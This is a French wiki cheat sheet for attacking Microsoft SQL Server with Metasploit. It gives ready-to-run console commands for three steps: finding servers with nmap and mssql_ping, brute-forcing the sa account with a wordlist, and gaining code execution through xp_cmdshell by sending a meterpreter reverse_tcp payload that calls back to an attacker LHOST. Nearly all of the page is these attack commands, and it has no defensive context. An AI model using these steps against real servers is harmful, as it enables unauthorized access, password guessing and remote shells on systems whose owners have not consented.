Sqlserveur metasploit
Aller à la navigation
Aller à la recherche
| Fiche express | |
|---|---|
| Domaine | Exploitation Microsoft SQL Server |
| Ports | 1433/tcp, 1434/udp |
| Modules | scanner/mssql/*, windows/mssql/*
|
| Voir aussi | Scans metasploit · Z construire son module metasploit |
Attaque d'un serveur Microsoft SQL Server : découverte, force brute du compte sa, puis exécution de commandes via xp_cmdshell. SQL Server écoute sur le port TCP 1433, ou sur un port dynamique — scanner alors 1434 en UDP.
Découverte
nmap -sU 192.168.0.0/24 -p1434
use scanner/mssql/mssql_ping
show options
set RHOSTS 192.168.0.0/24
set THREADS 255
run
Force brute
use scanner/mssql/mssql_login
show options
set PASS_FILE /pentest/exploits/fasttrack/bin/dict/wordlist.txt
set THREADS 10
set verbose false
exploit
xp_cmdshell
Avec ce module, on interagit avec le système via le compte sa (services exécutés en SYSTEM) :
use windows/mssql/mssql_payload
show options
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.19
set RHOST 192.168.0.31
set PASSWORD password123
exploit
Voir aussi
- Scans metasploit — prise d'empreinte MSSQL
- Z construire son module metasploit — payload PowerShell via MSSQL